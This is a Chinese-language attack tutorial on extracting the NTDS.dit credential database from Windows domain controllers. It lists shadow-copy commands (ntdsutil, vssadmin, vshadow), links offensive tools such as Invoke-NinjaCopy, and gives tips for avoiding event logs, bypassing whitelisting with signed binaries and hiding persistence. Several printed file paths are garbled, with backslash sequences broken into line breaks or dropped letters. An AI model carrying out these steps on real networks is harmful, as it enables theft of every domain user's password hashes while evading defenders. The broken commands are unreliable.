域滲透——獲得域控伺服器的NTDS.dit文件

0x00 前言

在之前的文章《導出當前域內所有用戶hash的技術整理》曾介紹過通過Volume Shadow Copy實現對ntds.dit文件的複製，可用來導出域內所有用戶hash。本文將嘗試做系統總結，總結多種不同的方法。

0x01 簡介

本文將要介紹以下內容：

·多種實現方法

·比較優缺點

0x02 通過Volume Shadow Copy獲得域控伺服器NTDS.dit文件

測試系統：

·Server 2008 R2 x64

·Server 2012 R2 x64

Volume Shadow Copy Service：

·用於數據備份

·支持Windows Server 2003 及以上操作系統

·系統默認在特定條件下自動創建數據備份，如補丁安裝後。在Win7系統大概每隔一周自動創建備份，該時間無法確定

·禁用VSS會影響系統正常使用，如 System Restore和 Windows Server Backup

1、ntdsutil

域環境默認安裝

支持系統：

·Server 2003

·Server 2008

·Server 2012

·…

常用命令：

(1) 查詢當前快照列表

ntdsutil snapshot "List All" quit quit

(2) 查詢已掛載的快照列表

ntdsutil snapshot "List Mounted" quit quit

(3) 創建快照

ntdsutil snapshot "activate instance ntds" create quit quit

(4) 掛載快照

ntdsutil snapshot "mount GUID" quit quit

(5) 卸載快照:

ntdsutil snapshot "unmount GUID" quit quit

(6) 刪除快照

ntdsutil snapshot "delete GUID" quit quit

實際測試：

(1) 查詢當前系統的快照

ntdsutil snapshot "List All" quit quit

ntdsutil snapshot "List Mounted" quit quit

(2) 創建快照

ntdsutil snapshot "activate instance ntds" create quit quit

guid為

如下圖

(3) 掛載快照

ntdsutil snapshot "mount " quit quit

快照掛載為C:$SNAP_201802270645_VOLUMEC$，如下圖

(4) 複製ntds.dit

copy C:$SNAP_201802270645_VOLUMEC$windowsNTDS
tds.dit c:
tds.dit

(5) 卸載快照:

ntdsutil snapshot "unmount " quit quit

(6) 刪除快照

ntdsutil snapshot "delete " quit quit

2、vssadmin

域環境默認安裝

支持系統：

·Server 2008

·Server 2012

·…

常用命令：

(1) 查詢當前系統的快照

vssadmin list shadows

(2) 創建快照

vssadmin create shadow /for=c:

(3) 刪除快照

vssadmin delete shadows /for=c: /quiet

實際測試：

(1) 查詢當前系統的快照

vssadmin list shadows

(2) 創建快照

vssadmin create shadow /for=c:

獲得Shadow Copy Volume Name為\?GLOBALROOTDeviceHarddiskVolumeShadowCopy12

如下圖

(3) 複製ntds.dit

copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy12windowsNTDS
tds.dit c:
tds.dit

(4) 刪除快照

vssadmin delete shadows /for=c: /quiet

3、vshadow.exe

系統默認不支持，可在Microsoft Windows Software Development Kit (SDK)中獲得該工具

註：

64位系統需要使用64位的vshadow.exe

不同系統可供使用的vshadow.exe下載地址：

http://edgylogic.com/blog/vshadow-exe-versions/

常用命令：

(1) 查詢當前系統的快照

vshadow.exe -q

(2) 創建快照

vshadow.exe -p -nw C:

參數說明：

-p persistent，備份操作或是重啟系統不會刪除

-nw no writers，用來提高創建速度

C: 對應c盤

(3) 刪除快照

vshadow -dx=ShadowCopySetId

vshadow -ds=ShadowCopyId

實際測試：

(1) 查詢當前系統的快照

vshadow.exe -q

(2) 創建快照

vshadow.exe -p -nw C:

獲得SnapshotSetID為

獲得SnapshotID為

獲得Shadow copy device name為\?GLOBALROOTDeviceHarddiskVolumeShadowCopy10

如下圖

(3) 複製ntds.dit

copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy10windowsNTDS
tds.dit c:
tds.dit

(4) 刪除快照

vshadow -dx=

or

vshadow -ds=

4、vssown.vbs

可供參考的下載地址：

https://raw.githubusercontent.com/borigue/ptscripts/master/windows/vssown.vbs

本質上是通過wmi對ShadowCopy進行操作

通過wmi查詢快照信息：

wmic /NAMESPACE:"\rootCIMV2" PATH Win32_ShadowCopy GET DeviceObject,ID,InstallDate /FORMAT:list

powershell實現：

https://github.com/samratashok/nishang/blob/master/Gather/Copy-VSS.ps1

擴展

1、日誌文件

調用Volume Shadow Copy服務會產生日誌文件，位於System下，Event ID為7036

執行ntdsutil snapshot "activate instance ntds" create quit quit會額外產生Event ID為98的日誌文件

如下圖

2、訪問快照中的文件

查看快照列表：

vssadmin list shadows

無法直接訪問\?GLOBALROOTDeviceHarddiskVolumeShadowCopy12中的文件

可通過創建符號鏈接訪問快照中的文件：

mklink /d c: estvsc \?GLOBALROOTDeviceHarddiskVolumeShadowCopy12

如下圖

刪除符號鏈接：

rd c: estvsc

利用思路：

如果當前系統存在快照文件，可對系統的歷史文件進行訪問

3、利用vshadow執行命令

參考資料：

https://bohops.com/2018/02/10/vshadow-abusing-the-volume-shadow-service-for-evasion-persistence-and-active-directory-database-extraction/

執行命令：

vshadow.exe -nw -exec=c:windowssystem32
otepad.exe c:

執行後，後台存在進程VSSVC.exe，同時顯示服務Volume Shadow Copy正在運行，需要手動關閉進程VSSVC.exe

註：

手動關閉進程VSSVC.exe會生成日誌7034

利用思路：

vshadow.exe包含微軟簽名，能繞過某些白名單的限制。如果作為啟動項，Autoruns的默認啟動列表不顯示

0x03 通過NinjaCopy獲得域控伺服器NTDS.dit文件

下載地址：

https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1

沒有調用Volume Shadow Copy服務，所以不會產生日誌文件7036

0x04 小結

本文整理了多種獲得域控伺服器NTDS.dit文件的方法，測試使用環境，比較優缺點。

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！